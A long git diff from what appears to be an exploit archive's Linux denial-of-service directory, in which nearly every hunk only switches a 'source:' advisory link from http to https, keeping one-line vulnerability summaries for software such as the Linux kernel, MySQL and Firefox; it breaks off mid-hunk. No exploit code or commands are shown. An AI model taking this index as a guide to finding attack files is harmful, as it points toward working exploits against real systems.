https://www.securityfocus.com/bid/31537/info Adobe Flash Player Plugin is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/32471.txt b/exploits/linux/dos/32471.txt index b923e42cb..22eead747 100644 --- a/exploits/linux/dos/32471.txt +++ b/exploits/linux/dos/32471.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31696/info +source: https://www.securityfocus.com/bid/31696/info KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted JavaScript code. diff --git a/exploits/linux/dos/32551.txt b/exploits/linux/dos/32551.txt index 69c86787c..e4edea168 100644 --- a/exploits/linux/dos/32551.txt +++ b/exploits/linux/dos/32551.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31997/info +source: https://www.securityfocus.com/bid/31997/info Dovecot is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted email headers. diff --git a/exploits/linux/dos/32675.py b/exploits/linux/dos/32675.py index c3e215d29..730dabb51 100755 --- a/exploits/linux/dos/32675.py +++ b/exploits/linux/dos/32675.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32910/info +source: https://www.securityfocus.com/bid/32910/info QEMU and KVM are prone to a remote denial-of-service vulnerability that affects the included VNC server. diff --git a/exploits/linux/dos/32682.c b/exploits/linux/dos/32682.c index d90c623a9..aed5cafaa 100644 --- a/exploits/linux/dos/32682.c +++ b/exploits/linux/dos/32682.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/32985/info +source: https://www.securityfocus.com/bid/32985/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/32696.txt b/exploits/linux/dos/32696.txt index 05990c86a..9900b6d61 100644 --- a/exploits/linux/dos/32696.txt +++ b/exploits/linux/dos/32696.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33085/info +source: https://www.securityfocus.com/bid/33085/info KDE Konqueror is prone to multiple cross-site scripting vulnerabilities and multiple denial-of-service vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/dos/32697.pl b/exploits/linux/dos/32697.pl index a0c2b3c86..3cf5711e3 100755 --- a/exploits/linux/dos/32697.pl +++ b/exploits/linux/dos/32697.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33096/info +source: https://www.securityfocus.com/bid/33096/info aMSN is prone to a remote denial-of-service vulnerability because the application fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/dos/32726.txt b/exploits/linux/dos/32726.txt index 414cf4c90..b1c1b581e 100644 --- a/exploits/linux/dos/32726.txt +++ b/exploits/linux/dos/32726.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33299/info +source: https://www.securityfocus.com/bid/33299/info Ganglia is prone to a remote stack-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/dos/32740.txt b/exploits/linux/dos/32740.txt index 8679382fe..361565f27 100644 --- a/exploits/linux/dos/32740.txt +++ b/exploits/linux/dos/32740.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33352/info +source: https://www.securityfocus.com/bid/33352/info QNX RTOS is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/32749.txt b/exploits/linux/dos/32749.txt index 43a36a6a5..5f27c634e 100644 --- a/exploits/linux/dos/32749.txt +++ b/exploits/linux/dos/32749.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33414/info +source: https://www.securityfocus.com/bid/33414/info Pidgin is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/dos/32775.txt b/exploits/linux/dos/32775.txt index 0e7a0f435..cc22db093 100644 --- a/exploits/linux/dos/32775.txt +++ b/exploits/linux/dos/32775.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33618/info +source: https://www.securityfocus.com/bid/33618/info The Linux kernel is prone to a local denial-of-service vulnerability because it fails to properly handle malformed filesystem images. diff --git a/exploits/linux/dos/32800.txt b/exploits/linux/dos/32800.txt index e28490063..243c299d9 100644 --- a/exploits/linux/dos/32800.txt +++ b/exploits/linux/dos/32800.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33749/info +source: https://www.securityfocus.com/bid/33749/info Poppler is prone to multiple denial-of-service vulnerabilities when handling malformed PDF files. diff --git a/exploits/linux/dos/32815.c b/exploits/linux/dos/32815.c index 8a34e857c..2afdd5643 100644 --- a/exploits/linux/dos/32815.c +++ b/exploits/linux/dos/32815.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/33906/info +source: https://www.securityfocus.com/bid/33906/info The Linux kernel is prone to an origin-validation weakness when dealing with signal handling. diff --git a/exploits/linux/dos/32838.txt b/exploits/linux/dos/32838.txt index f8b77944e..9ee60b51a 100644 --- a/exploits/linux/dos/32838.txt +++ b/exploits/linux/dos/32838.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33972/info +source: https://www.securityfocus.com/bid/33972/info MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain XPath expressions. diff --git a/exploits/linux/dos/32849.txt b/exploits/linux/dos/32849.txt index 103476363..c85674c4b 100644 --- a/exploits/linux/dos/32849.txt +++ b/exploits/linux/dos/32849.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34090/info +source: https://www.securityfocus.com/bid/34090/info PostgreSQL is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/32856.txt b/exploits/linux/dos/32856.txt index 33a7003e5..bbd2c9d69 100644 --- a/exploits/linux/dos/32856.txt +++ b/exploits/linux/dos/32856.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34136/info +source: https://www.securityfocus.com/bid/34136/info MPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed media files. diff --git a/exploits/linux/dos/32857.txt b/exploits/linux/dos/32857.txt index c1e014dd8..6bde20ce5 100644 --- a/exploits/linux/dos/32857.txt +++ b/exploits/linux/dos/32857.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34136/info +source: https://www.securityfocus.com/bid/34136/info MPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed media files. diff --git a/exploits/linux/dos/32961.html b/exploits/linux/dos/32961.html index e1d27295c..39d321edd 100644 --- a/exploits/linux/dos/32961.html +++ b/exploits/linux/dos/32961.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34743/info +source: https://www.securityfocus.com/bid/34743/info Mozilla Firefox is prone to a remote memory-corruption vulnerability. diff --git a/exploits/linux/dos/32964.c b/exploits/linux/dos/32964.c index 0f99f0485..7f8efd501 100644 --- a/exploits/linux/dos/32964.c +++ b/exploits/linux/dos/32964.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34783/info +// source: https://www.securityfocus.com/bid/34783/info GnuTLS is prone to multiple remote vulnerabilities: diff --git a/exploits/linux/dos/32995.txt b/exploits/linux/dos/32995.txt index 65005ef9d..ce5754e1a 100644 --- a/exploits/linux/dos/32995.txt +++ b/exploits/linux/dos/32995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34944/info +source: https://www.securityfocus.com/bid/34944/info Sendmail is prone to a heap-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer. diff --git a/exploits/linux/dos/33015.c b/exploits/linux/dos/33015.c index 5b4d3cef9..938efd101 100644 --- a/exploits/linux/dos/33015.c +++ b/exploits/linux/dos/33015.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/35143/info +source: https://www.securityfocus.com/bid/35143/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/33017.txt b/exploits/linux/dos/33017.txt index 9746b13fb..46a3b607f 100644 --- a/exploits/linux/dos/33017.txt +++ b/exploits/linux/dos/33017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35148/info +source: https://www.securityfocus.com/bid/35148/info Adobe Acrobat is prone to a denial-of-service vulnerability because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/33020.py b/exploits/linux/dos/33020.py index 5bde7ee74..9e7a25c7f 100755 --- a/exploits/linux/dos/33020.py +++ b/exploits/linux/dos/33020.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35169/info +source: https://www.securityfocus.com/bid/35169/info CUPS is prone to a denial-of-service vulnerability because of a NULL-pointer dereference that occurs when processing two consecutive IPP_TAG_UNSUPPORTED tags in specially crafted IPP (Internet Printing Protocal) packets. diff --git a/exploits/linux/dos/33031.html b/exploits/linux/dos/33031.html index 9d8202f62..6bde26b62 100644 --- a/exploits/linux/dos/33031.html +++ b/exploits/linux/dos/33031.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35280/info +source: https://www.securityfocus.com/bid/35280/info Mozilla Firefox is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/33036.txt b/exploits/linux/dos/33036.txt index 72803cc96..573b34da0 100644 --- a/exploits/linux/dos/33036.txt +++ b/exploits/linux/dos/33036.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35338/info +source: https://www.securityfocus.com/bid/35338/info Git is prone to a denial-of-service vulnerability because it fails to properly handle some client requests. diff --git a/exploits/linux/dos/33040.txt b/exploits/linux/dos/33040.txt index 4c96c90f2..5c42eeb8e 100644 --- a/exploits/linux/dos/33040.txt +++ b/exploits/linux/dos/33040.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35390/info +source: https://www.securityfocus.com/bid/35390/info GUPnP is prone to a vulnerability that remote attackers may exploit to cause denial-of-service conditions. diff --git a/exploits/linux/dos/33041.txt b/exploits/linux/dos/33041.txt index 04849d3f2..ac9722335 100644 --- a/exploits/linux/dos/33041.txt +++ b/exploits/linux/dos/33041.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35399/info +source: https://www.securityfocus.com/bid/35399/info Irssi is prone to an off-by-one, heap-based, memory-corruption vulnerability because it fails to properly bounds-check user-supplied data before copying it into a memory buffer. diff --git a/exploits/linux/dos/33042.txt b/exploits/linux/dos/33042.txt index fc5896cec..573217418 100644 --- a/exploits/linux/dos/33042.txt +++ b/exploits/linux/dos/33042.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35413/info +source: https://www.securityfocus.com/bid/35413/info Mozilla Firefox is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/33043.txt b/exploits/linux/dos/33043.txt index 00326ad0e..3eb8a1371 100644 --- a/exploits/linux/dos/33043.txt +++ b/exploits/linux/dos/33043.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35415/info +source: https://www.securityfocus.com/bid/35415/info The Linux kernel is prone to a local denial-of-service vulnerability that attackers can exploit to cause an affected computer to crash. diff --git a/exploits/linux/dos/33049.txt b/exploits/linux/dos/33049.txt index 864b433a6..93bb732d3 100644 --- a/exploits/linux/dos/33049.txt +++ b/exploits/linux/dos/33049.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35451/info +source: https://www.securityfocus.com/bid/35451/info LibTIFF is prone to a remote buffer-underflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/33077.c b/exploits/linux/dos/33077.c index 9dcb3e402..46723d907 100644 --- a/exploits/linux/dos/33077.c +++ b/exploits/linux/dos/33077.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35609/info +// source: https://www.securityfocus.com/bid/35609/info MySQL is prone to multiple format-string vulnerabilities. diff --git a/exploits/linux/dos/33088.txt b/exploits/linux/dos/33088.txt index 13c0b0fb0..e3ccf6f9b 100644 --- a/exploits/linux/dos/33088.txt +++ b/exploits/linux/dos/33088.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35724/info +source: https://www.securityfocus.com/bid/35724/info The Linux kernel is prone to a local NULL-pointer dereference vulnerability. diff --git a/exploits/linux/dos/33101.txt b/exploits/linux/dos/33101.txt index 7a1c8e10e..4e50d4097 100644 --- a/exploits/linux/dos/33101.txt +++ b/exploits/linux/dos/33101.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35775/info +source: https://www.securityfocus.com/bid/35775/info Mozilla Firefox and Thunderbird are prone to a remote memory-corruption vulnerability that attackers can exploit to cause denial-of-service conditions and possibly execute arbitrary code. diff --git a/exploits/linux/dos/33134.txt b/exploits/linux/dos/33134.txt index 3ac7f8f93..c1848a4d9 100644 --- a/exploits/linux/dos/33134.txt +++ b/exploits/linux/dos/33134.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35907/info +source: https://www.securityfocus.com/bid/35907/info Adobe Flash Player and Adobe AIR are prone to an integer-overflow vulnerability. diff --git a/exploits/linux/dos/33148.c b/exploits/linux/dos/33148.c index 5a71a045e..b9dc94212 100644 --- a/exploits/linux/dos/33148.c +++ b/exploits/linux/dos/33148.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/35976/info +source: https://www.securityfocus.com/bid/35976/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/33176.rb b/exploits/linux/dos/33176.rb index ba01eb0ee..c75c3f7f8 100755 --- a/exploits/linux/dos/33176.rb +++ b/exploits/linux/dos/33176.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36074/info +source: https://www.securityfocus.com/bid/36074/info The 'ntop' tool is prone to a denial-of-service vulnerability because of a NULL-pointer dereference that occurs when crafted HTTP Basic Authentication credentials are received by the embedded webserver. diff --git a/exploits/linux/dos/33193.c b/exploits/linux/dos/33193.c index 2bd6fdeaf..de2e1a405 100644 --- a/exploits/linux/dos/33193.c +++ b/exploits/linux/dos/33193.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/36191/info +source: https://www.securityfocus.com/bid/36191/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/33222.txt b/exploits/linux/dos/33222.txt index 93359ab32..dd6f1e72d 100644 --- a/exploits/linux/dos/33222.txt +++ b/exploits/linux/dos/33222.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36408/info +source: https://www.securityfocus.com/bid/36408/info Wireshark is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/33223.txt b/exploits/linux/dos/33223.txt index 613daf367..748583b54 100644 --- a/exploits/linux/dos/33223.txt +++ b/exploits/linux/dos/33223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36408/info +source: https://www.securityfocus.com/bid/36408/info Wireshark is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/33224.txt b/exploits/linux/dos/33224.txt index 979dbb60d..e389ca8af 100644 --- a/exploits/linux/dos/33224.txt +++ b/exploits/linux/dos/33224.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36408/info +source: https://www.securityfocus.com/bid/36408/info Wireshark is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/33228.txt b/exploits/linux/dos/33228.txt index 0f3ca11f2..e4b3a3948 100644 --- a/exploits/linux/dos/33228.txt +++ b/exploits/linux/dos/33228.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36423/info +source: https://www.securityfocus.com/bid/36423/info The Linux kernel is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/33230.txt b/exploits/linux/dos/33230.txt index 258f8328d..c03cefcc6 100644 --- a/exploits/linux/dos/33230.txt +++ b/exploits/linux/dos/33230.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36443/info +source: https://www.securityfocus.com/bid/36443/info GNU glibc is prone to an integer-overflow weakness. diff --git a/exploits/linux/dos/33233.txt b/exploits/linux/dos/33233.txt index 663f96ea0..b8c44de13 100644 --- a/exploits/linux/dos/33233.txt +++ b/exploits/linux/dos/33233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36465/info +source: https://www.securityfocus.com/bid/36465/info FFmpeg is prone to multiple remote vulnerabilities. diff --git a/exploits/linux/dos/33269.txt b/exploits/linux/dos/33269.txt index 95cc4e4c8..961a3db8d 100644 --- a/exploits/linux/dos/33269.txt +++ b/exploits/linux/dos/33269.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36606/info +source: https://www.securityfocus.com/bid/36606/info Dopewars is prone to a denial-of-service vulnerability that affects the server part of the application. diff --git a/exploits/linux/dos/33283.txt b/exploits/linux/dos/33283.txt index a73013991..f6f90226e 100644 --- a/exploits/linux/dos/33283.txt +++ b/exploits/linux/dos/33283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36668/info +source: https://www.securityfocus.com/bid/36668/info Adobe Reader and Acrobat are prone to a remote code-execution vulnerability because they fail to properly handle certain COM objects. diff --git a/exploits/linux/dos/33289.txt b/exploits/linux/dos/33289.txt index ee765c6bf..70af293cb 100644 --- a/exploits/linux/dos/33289.txt +++ b/exploits/linux/dos/33289.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36706/info +source: https://www.securityfocus.com/bid/36706/info The Linux kernel is prone to a local denial-of-service vulnerability that attackers can exploit to cause an affected computer to panic. diff --git a/exploits/linux/dos/33306.txt b/exploits/linux/dos/33306.txt index 1a9b83ab4..549d166cf 100644 --- a/exploits/linux/dos/33306.txt +++ b/exploits/linux/dos/33306.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36795/info +source: https://www.securityfocus.com/bid/36795/info Snort is prone to multiple denial-of-service vulnerabilities because the application fails to properly process specially crafted IPv6 packets. diff --git a/exploits/linux/dos/33312.txt b/exploits/linux/dos/33312.txt index 0a84a49f1..8d24af7d8 100644 --- a/exploits/linux/dos/33312.txt +++ b/exploits/linux/dos/33312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36851/info +source: https://www.securityfocus.com/bid/36851/info Mozilla Firefox is prone to a heap-based buffer-overflow vulnerability. diff --git a/exploits/linux/dos/33314.html b/exploits/linux/dos/33314.html index 3f928f14e..f5ffe61f4 100644 --- a/exploits/linux/dos/33314.html +++ b/exploits/linux/dos/33314.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36866/info +source: https://www.securityfocus.com/bid/36866/info Mozilla Firefox is prone to a remote memory-corruption vulnerability. diff --git a/exploits/linux/dos/33397.txt b/exploits/linux/dos/33397.txt index e21f70e6c..7f8e2c005 100644 --- a/exploits/linux/dos/33397.txt +++ b/exploits/linux/dos/33397.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37297/info +source: https://www.securityfocus.com/bid/37297/info MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions. diff --git a/exploits/linux/dos/33398.txt b/exploits/linux/dos/33398.txt index 233d4e184..35b913b2f 100644 --- a/exploits/linux/dos/33398.txt +++ b/exploits/linux/dos/33398.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37297/info +source: https://www.securityfocus.com/bid/37297/info MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions. diff --git a/exploits/linux/dos/33480.txt b/exploits/linux/dos/33480.txt index c23460175..1187ed160 100644 --- a/exploits/linux/dos/33480.txt +++ b/exploits/linux/dos/33480.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37688/info +source: https://www.securityfocus.com/bid/37688/info MATLAB is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index. diff --git a/exploits/linux/dos/33524.txt b/exploits/linux/dos/33524.txt index e9c1a3140..fa2ba36e5 100644 --- a/exploits/linux/dos/33524.txt +++ b/exploits/linux/dos/33524.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37807/info +source: https://www.securityfocus.com/bid/37807/info OpenOffice is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/33549.txt b/exploits/linux/dos/33549.txt index a06f57089..e448d5fd5 100644 --- a/exploits/linux/dos/33549.txt +++ b/exploits/linux/dos/33549.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37857/info +source: https://www.securityfocus.com/bid/37857/info OpenOffice is prone to a remote denial-of-service vulnerability caused by a NULL-pointer dereference. diff --git a/exploits/linux/dos/33571.txt b/exploits/linux/dos/33571.txt index 6e618f055..5cf3c20c5 100644 --- a/exploits/linux/dos/33571.txt +++ b/exploits/linux/dos/33571.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37973/info +source: https://www.securityfocus.com/bid/37973/info PostgreSQL is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/33581.txt b/exploits/linux/dos/33581.txt index 609990b12..2262a3d3b 100644 --- a/exploits/linux/dos/33581.txt +++ b/exploits/linux/dos/33581.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38006/info +source: https://www.securityfocus.com/bid/38006/info Hybserv2 is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/33591.sh b/exploits/linux/dos/33591.sh index 3ded71125..f6905b114 100755 --- a/exploits/linux/dos/33591.sh +++ b/exploits/linux/dos/33591.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38036/info +source: https://www.securityfocus.com/bid/38036/info The 'lighttpd' webserver is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/33592.txt b/exploits/linux/dos/33592.txt index 267b0b193..4f399d383 100644 --- a/exploits/linux/dos/33592.txt +++ b/exploits/linux/dos/33592.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38038/info +source: https://www.securityfocus.com/bid/38038/info The Linux kernel is prone to a local denial-of-service vulnerability that affects the Kernel-based Virtual Machine (KVM). diff --git a/exploits/linux/dos/33635.c b/exploits/linux/dos/33635.c index 60ac0f329..6afbc0e41 100644 --- a/exploits/linux/dos/33635.c +++ b/exploits/linux/dos/33635.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/38185/info +source: https://www.securityfocus.com/bid/38185/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/33672.txt b/exploits/linux/dos/33672.txt index 28f1e7f86..49ed21c9a 100644 --- a/exploits/linux/dos/33672.txt +++ b/exploits/linux/dos/33672.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38395/info +source: https://www.securityfocus.com/bid/38395/info Kojoney is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/33801.txt b/exploits/linux/dos/33801.txt index 99639100f..36b142e9c 100644 --- a/exploits/linux/dos/33801.txt +++ b/exploits/linux/dos/33801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38944/info +source: https://www.securityfocus.com/bid/38944/info Mozilla Firefox, Thunderbird and Seamonkey are prone to multiple remote memory-corruption vulnerabilities. diff --git a/exploits/linux/dos/33850.txt b/exploits/linux/dos/33850.txt index deab3e9a2..ba30d2d98 100644 --- a/exploits/linux/dos/33850.txt +++ b/exploits/linux/dos/33850.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39577/info +source: https://www.securityfocus.com/bid/39577/info memcached is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/33886.txt b/exploits/linux/dos/33886.txt index 9128c29eb..40ab21cf5 100644 --- a/exploits/linux/dos/33886.txt +++ b/exploits/linux/dos/33886.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39719/info +source: https://www.securityfocus.com/bid/39719/info The Linux kernel is prone to a local memory-corruption vulnerability. diff --git a/exploits/linux/dos/33965.txt b/exploits/linux/dos/33965.txt index 6ce5960d3..18c70e520 100644 --- a/exploits/linux/dos/33965.txt +++ b/exploits/linux/dos/33965.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40009/info +source: https://www.securityfocus.com/bid/40009/info Geo++ GNCASTER is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/33966.rb b/exploits/linux/dos/33966.rb index 1766be466..c3764b82a 100755 --- a/exploits/linux/dos/33966.rb +++ b/exploits/linux/dos/33966.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40015/info +source: https://www.securityfocus.com/bid/40015/info Geo++ GNCASTER is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/34228.txt b/exploits/linux/dos/34228.txt index b02019d82..4d086bd9f 100644 --- a/exploits/linux/dos/34228.txt +++ b/exploits/linux/dos/34228.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41251/info +source: https://www.securityfocus.com/bid/41251/info Mumble Murmur is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/34249.txt b/exploits/linux/dos/34249.txt index b598bb608..894ccde44 100644 --- a/exploits/linux/dos/34249.txt +++ b/exploits/linux/dos/34249.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41352/info +source: https://www.securityfocus.com/bid/41352/info Freeciv is prone to multiple remote denial-of-service vulnerabilities because the application fails to properly handle specially crafted network packets. diff --git a/exploits/linux/dos/34278.txt b/exploits/linux/dos/34278.txt index 1028725d5..ed3e0792e 100644 --- a/exploits/linux/dos/34278.txt +++ b/exploits/linux/dos/34278.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41475/info +source: https://www.securityfocus.com/bid/41475/info LibTIFF is prone to a denial-of-service vulnerability because it fails to properly validate user-supplied input. diff --git a/exploits/linux/dos/34279.txt b/exploits/linux/dos/34279.txt index 9304dbf33..f296c4515 100644 --- a/exploits/linux/dos/34279.txt +++ b/exploits/linux/dos/34279.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41477/info +source: https://www.securityfocus.com/bid/41477/info LibTIFF is prone to a denial-of-service vulnerability because it fails to properly validate user-supplied input. diff --git a/exploits/linux/dos/34348.txt b/exploits/linux/dos/34348.txt index f90929f31..66c618198 100644 --- a/exploits/linux/dos/34348.txt +++ b/exploits/linux/dos/34348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41770/info +source: https://www.securityfocus.com/bid/41770/info OpenLDAP is prone to multiple vulnerabilities. diff --git a/exploits/linux/dos/34356.txt b/exploits/linux/dos/34356.txt index ed3d49042..519caabd3 100644 --- a/exploits/linux/dos/34356.txt +++ b/exploits/linux/dos/34356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41801/info +source: https://www.securityfocus.com/bid/41801/info gif2png is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/dos/34364.html b/exploits/linux/dos/34364.html index ec26b177c..219db2d0f 100644 --- a/exploits/linux/dos/34364.html +++ b/exploits/linux/dos/34364.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41873/info +source: https://www.securityfocus.com/bid/41873/info Qt is prone to a remote memory-corruption vulnerability. diff --git a/exploits/linux/dos/34375.txt b/exploits/linux/dos/34375.txt index f4fe528a2..d96039a69 100644 --- a/exploits/linux/dos/34375.txt +++ b/exploits/linux/dos/34375.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41965/info +source: https://www.securityfocus.com/bid/41965/info sSMTP is prone to a remote buffer-overflow vulnerability. diff --git a/exploits/linux/dos/34427.txt b/exploits/linux/dos/34427.txt index 8d0c96831..4f6cdd6fc 100644 --- a/exploits/linux/dos/34427.txt +++ b/exploits/linux/dos/34427.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42306/info +source: https://www.securityfocus.com/bid/42306/info OpenSSL is prone to a remote memory-corruption vulnerability. diff --git a/exploits/linux/dos/34506.txt b/exploits/linux/dos/34506.txt index e0c6dfbf1..be1638c15 100644 --- a/exploits/linux/dos/34506.txt +++ b/exploits/linux/dos/34506.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42599/info +source: https://www.securityfocus.com/bid/42599/info MySQL is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/34510.txt b/exploits/linux/dos/34510.txt index e916dfbac..f37b11108 100644 --- a/exploits/linux/dos/34510.txt +++ b/exploits/linux/dos/34510.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42625/info +source: https://www.securityfocus.com/bid/42625/info MySQL is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/34520.txt b/exploits/linux/dos/34520.txt index 4243c3da7..8b8bb2eb5 100644 --- a/exploits/linux/dos/34520.txt +++ b/exploits/linux/dos/34520.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42633/info +source: https://www.securityfocus.com/bid/42633/info MySQL is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/34521.txt b/exploits/linux/dos/34521.txt index 72fca3447..fdb3a4fb7 100644 --- a/exploits/linux/dos/34521.txt +++ b/exploits/linux/dos/34521.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42638/info +source: https://www.securityfocus.com/bid/42638/info MySQL is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/34522.txt b/exploits/linux/dos/34522.txt index c0bedb913..b5ce859cb 100644 --- a/exploits/linux/dos/34522.txt +++ b/exploits/linux/dos/34522.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42643/info +source: https://www.securityfocus.com/bid/42643/info MySQL is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/34953.txt b/exploits/linux/dos/34953.txt index 9ce8a7c60..f6f40ba9b 100644 --- 